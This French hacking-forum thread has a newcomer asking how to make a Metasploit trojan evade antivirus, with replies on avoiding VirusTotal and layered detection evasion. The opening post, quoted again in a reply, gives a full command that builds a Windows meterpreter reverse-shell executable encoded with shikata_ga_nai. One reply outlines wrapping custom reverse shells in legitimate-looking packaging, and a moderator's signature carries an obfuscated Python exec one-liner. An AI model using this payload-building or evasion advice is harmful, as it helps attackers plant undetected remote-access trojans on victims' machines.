Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 07-10-2014 19:11:11

docteurdread
N00b
Inscription : 07-10-2014
Messages : 4

[Metasploit] Trojan: rendre indétectable?

Bonjour tout le monde!
J'ai découvert ce forum il y a peu et la communauté me semble bien informée et très sympa, donc je vais m'incruster dans vos forums big_smile

Je travaille pour le moment sur Kali Linux, installé via virtual box sur mon win8, ce qui est bien meilleur ! ^^
J'ai bien évidemment commencé à bosser avec le fameux metasploit, outil très complet mais j'ai quelques questions sur la création de trojans. En particulier le fait des les rendre indétectables aux antivirus smile

J'ai utilisé cette commande: (après avoir fait le msfconsole bien sûr big_smile )

msfpayload windows/meterpreter/reverse_tcp LHOST="IP LOCALE" LPORT=4444 R | msfencore  -c 200  -e x86/shikata_ga_nai > /root/Desktop/trojan.exe

Malheureusement, il ne passe que 11 antivirus sur 55 ^^ (virustotal.com)
Je me demande donc ce qui permet de changer la donne et passer presque voir tous les antivirus smile (je sais qu'il faut beaucoup de boulot, mais je suis prêt à y passer).
J'ai déjà réfléchi au fait que shikata est assez connu mais je n'ai pas trouvé d'autres encodeurs et je ne sais pas ou ils se situent sur kali :s


Merci beaucoup d'avance ! big_smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 07-10-2014 19:21:31

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : [Metasploit] Trojan: rendre indétectable?

Ben déjà tant que tu le passera sur virus total, il sera pas longtemps indétectable, ils testent les échantillons ensuite pour les rajouter dans leurs signatures.


1310812721.gif

Hors Ligne

#3 07-10-2014 19:37:25

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : [Metasploit] Trojan: rendre indétectable?

docteurdread a écrit :

Bonjour tout le monde!
J'ai découvert ce forum il y a peu et la communauté me semble bien informée et très sympa, donc je vais m'incruster dans vos forums big_smile

Je travaille pour le moment sur Kali Linux, installé via virtual box sur mon win8, ce qui est bien meilleur ! ^^
J'ai bien évidemment commencé à bosser avec le fameux metasploit, outil très complet mais j'ai quelques questions sur la création de trojans. En particulier le fait des les rendre indétectables aux antivirus smile

J'ai utilisé cette commande: (après avoir fait le msfconsole bien sûr big_smile )

msfpayload windows/meterpreter/reverse_tcp LHOST="IP LOCALE" LPORT=4444 R | msfencore  -c 200  -e x86/shikata_ga_nai > /root/Desktop/trojan.exe

Malheureusement, il ne passe que 11 antivirus sur 55 ^^ (virustotal.com)
Je me demande donc ce qui permet de changer la donne et passer presque voir tous les antivirus smile (je sais qu'il faut beaucoup de boulot, mais je suis prêt à y passer).
J'ai déjà réfléchi au fait que shikata est assez connu mais je n'ai pas trouvé d'autres encodeurs et je ne sais pas ou ils se situent sur kali :s


Merci beaucoup d'avance ! big_smile


La politesse et mon éducation m'oblige à tout d'abord te souhaiter la bienvenue sur le forum, bien que tu n'ai pas pris la peine de te presenter au reste des autres dans la section adequate mais juste venir poster ton problème en attendant une réponse.

Ca, c'est fait lol

Juste avant de revenir sur ton soucis, je te stoppe tout de suite sur un point!


Kali n'est pas un jouet mais une vrai production et croire sous VM (virtual machine), tu vas avoir des uper resultats, tu te mets le doigt dans l'oeil, jusqu'a l'endroit qui te soulage quand l'envie est plus forte que tout!

Ca, c'est fait aussi! lol


Concernant le passage sous virustotal, Maitre Coyotus a su te donner la reponse la plus adaptée. Merci à lui d'ailleurs si cela n'est pas fait par tes soins wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#4 08-10-2014 11:55:19

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : [Metasploit] Trojan: rendre indétectable?

« on the infeasibility of modeling polymorphic shellcode » sur ton moteur de recherche préféré. smile
Tous les antivirus se bypassent. Utiliser des packers en boucle n'est pas la meilleure solution.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#5 08-10-2014 12:56:23

docteurdread
N00b
Inscription : 07-10-2014
Messages : 4

Re : [Metasploit] Trojan: rendre indétectable?

Déjà, merci à tous pour vos réponses si rapides ! wink

coyotus a écrit :

Ben déjà tant que tu le passera sur virus total, il sera pas longtemps indétectable, ils testent les échantillons ensuite pour les rajouter dans leurs signatures.

Merci pour l'info smile
Mais existe-t-il un outil autre que virustotal.com pour tester nos petits trojans? ^^



Furyo a écrit :

La politesse et mon éducation m'oblige à tout d'abord te souhaiter la bienvenue sur le forum, bien que tu n'ai pas pris la peine de te presenter au reste des autres dans la section adequate mais juste venir poster ton problème en attendant une réponse.

Ca, c'est fait lol

Juste avant de revenir sur ton soucis, je te stoppe tout de suite sur un point!

Kali n'est pas un jouet mais une vrai production et croire sous VM (virtual machine), tu vas avoir des uper resultats, tu te mets le doigt dans l'oeil, jusqu'a l'endroit qui te soulage quand l'envie est plus forte que tout!

Ca, c'est fait aussi! lol

Concernant le passage sous virustotal, Maitre Coyotus a su te donner la reponse la plus adaptée. Merci à lui d'ailleurs si cela n'est pas fait par tes soins wink

Désolé pour la présentation hmm Je l'ai faite en rentrant des cours wink
Que veux-tu dire par "uper résultats" ?


spawn a écrit :

« on the infeasibility of modeling polymorphic shellcode » sur ton moteur de recherche préféré. smile
Tous les antivirus se bypassent. Utiliser des packers en boucle n'est pas la meilleure solution.

Donc, je dois essayer de créer mon propre encodeur? :p

Hors Ligne

#6 16-03-2015 15:04:11

romeoandjuliet
Membre Actif
Inscription : 23-02-2015
Messages : 25

Re : [Metasploit] Trojan: rendre indétectable?

Voici un début de piste :
www.0x0ff.info\2013\antivirus-technique-devasion-logiciels-espions\index.html

Il va te falloir apprendre a coder.

Pour resumer :
Il ya trois niveaux de detection :
1) Par signature : en clair on cherche des "patterns" de shellcode connus pour etre nuisibles
2) Pour contourner ca on utilise des encodeurs -> injection de "code anti-desassemblage", obfuscation etc
Donc cetains AV utilisent l'analyse heuristique : c'est a dire l'analyse du comportement.
3) Pour contourner ca, on doit nos^propores reverse shell en evitqnt des appels et des fionctions trop "suspicieuses" et empaqueter tout ca dans un emballage "legitime".

C'est du boulot ^^ mais ca se fait avec un peude temps et de determination

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.055 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]